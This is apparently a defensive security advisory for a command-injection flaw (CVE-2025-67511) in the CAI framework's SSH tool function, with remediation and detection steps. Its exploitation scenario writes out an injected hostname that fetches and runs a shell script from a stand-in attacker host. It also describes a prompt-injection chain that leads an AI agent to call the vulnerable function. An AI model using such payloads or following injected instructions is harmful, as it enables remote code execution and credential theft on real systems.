AI Threat Alert
If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| cai-framework | pip | <= 0.5.9 | No patch |
| cybersecurity_ai | — | — | No patch |
Severity & Risk
Recommended Action
- 1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework. 2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level. 3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged. 4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework. 5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection; while username, host and port values are injectable. This issue does not have a fix at the time of publication.
Exploitation Scenario
An adversary conducting a penetration test or red team engagement using CAI >= 0.5.9 targets a security operations team also running CAI. Step 1: Attacker crafts a malicious target hostname — e.g., 'victim.com; curl attacker.com/shell.sh | bash' — and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context). Step 2: The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value. Step 3: Because host is not sanitized, the shell executes both the SSH command and the injected payload. Step 4: Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H References
- github.com/advisories/GHSA-4c65-9gqf-4w8h
- github.com/aliasrobotics/cai/commit/09ccb6e0baccf56c40e6cb429c698750843a999c
- github.com/aliasrobotics/cai/security/advisories/GHSA-4c65-9gqf-4w8h
- nvd.nist.gov/vuln/detail/CVE-2025-67511
- hacktivesecurity.com/blog/2025/12/10/cve-2025-67511-tricking-a-security-ai-agent-into-pwning-itself
- github.com/aliasrobotics/cai/commit/09ccb6e0baccf56c40e6cb429c698750843a999c Patch
- github.com/aliasrobotics/cai/security/advisories/GHSA-4c65-9gqf-4w8h Exploit Vendor
- hacktivesecurity.com/blog/2025/12/10/cve-2025-67511-tricking-a-security-ai-agent-into-pwning-itself Exploit Press/Media Coverage 3rd Party